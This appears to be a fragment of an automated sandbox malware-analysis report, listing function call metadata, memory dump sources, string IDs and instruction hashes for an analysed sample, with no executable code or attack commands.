                                          • Instruction Fuzzy Hash: 5501F9B1F00248DFC720EFB8AD51B6D7360EB15304FA042A9E5195B2D0E7747541CB56
                                          APIs
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 0040847E
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: CD^O$_DC[
                                          • API String ID: 2296764815-3597986494
                                          • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                          • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                          • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                          • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                          APIs
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 00407EBE
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: CD^O$_DC[
                                          • API String ID: 2296764815-3597986494
                                          • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                          • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                          • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                          • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                          APIs
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B47AD0
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                          • String ID: DCDO$EDO*
                                          • API String ID: 4132704954-3480089779
                                          • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                          • Instruction ID: ba87e77ffeec28d91f53759c86d1376a903d18f350afa9d113613f022f973f5e
                                          • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                          • Instruction Fuzzy Hash: 9701ADB0F44208DBDB20DFB4E841E4DB7B0EB54304F9045BAD80197390CA34AA06DB49
                                          APIs
                                            • Part of subcall function 04B49EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EF7
                                            • Part of subcall function 04B49EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49F34
                                          • __Init_thread_footer.LIBCMT ref: 04B47BE0
                                            • Part of subcall function 04B49EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B49EAC
                                            • Part of subcall function 04B49EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B49EDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2611357817.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_4b40000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                          • String ID: DCDO$^]E*
                                          • API String ID: 4132704954-2708296792
                                          • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                          • Instruction ID: 3b424d424484a3a275da778fe7010d69b2ac0140a9b36c828e8ef984844fc772
                                          • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                          • Instruction Fuzzy Hash: 6301A4F0F40208EBD720DFA9E882A9E77B0E784304F9041BAE81557390DA35B985DF49
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D06C69
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: DCDO$EDO*
                                          • API String ID: 1385522511-3480089779
                                          • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                          • Instruction ID: b5e856f7396c3c60b266ce565ba433e5d85438ef20bebead108bd85afd4598a2
                                          • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                          • Instruction Fuzzy Hash: 0D016D74F04208DBDB20DFA4E851F5DBBB0EB14708F9081BAD915977D0DA34A902CF59
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 04D06D79
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000003.1947099269.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID: DCDO$^]E*
                                          • API String ID: 1385522511-2708296792
                                          • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                          • Instruction ID: 579b023d7285c4c03fa239704512789439a77be56487fb9fb6d8defeb7330fa5
                                          • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                          • Instruction Fuzzy Hash: 1F0136B0F00208DFD720EFA8D89279D77B0E744704F9081BAE919573D0D635A985CF59
                                          APIs
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 00407869
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: DCDO$EDO*
                                          • API String ID: 2296764815-3480089779
                                          • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                          • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                          • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                          • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                          APIs
                                            • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                            • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                          • __Init_thread_footer.LIBCMT ref: 00407979
                                            • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                            • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                            • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2609181185.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                          • String ID: DCDO$^]E*
                                          • API String ID: 2296764815-2708296792
                                          • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                          • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                          • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                          • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D